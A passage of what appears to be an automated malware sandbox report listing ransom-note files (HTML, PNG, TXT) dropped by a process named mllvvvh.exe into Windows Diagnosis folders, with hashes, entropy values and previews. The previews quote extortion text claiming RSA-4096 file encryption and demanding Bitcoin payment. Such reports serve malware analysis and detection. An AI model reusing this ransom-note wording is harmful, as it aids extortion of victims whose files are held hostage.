                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ScenarioShutdownLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\ETLLogs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\EventTranscript\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\LocalTraceStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\OfflineSettings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
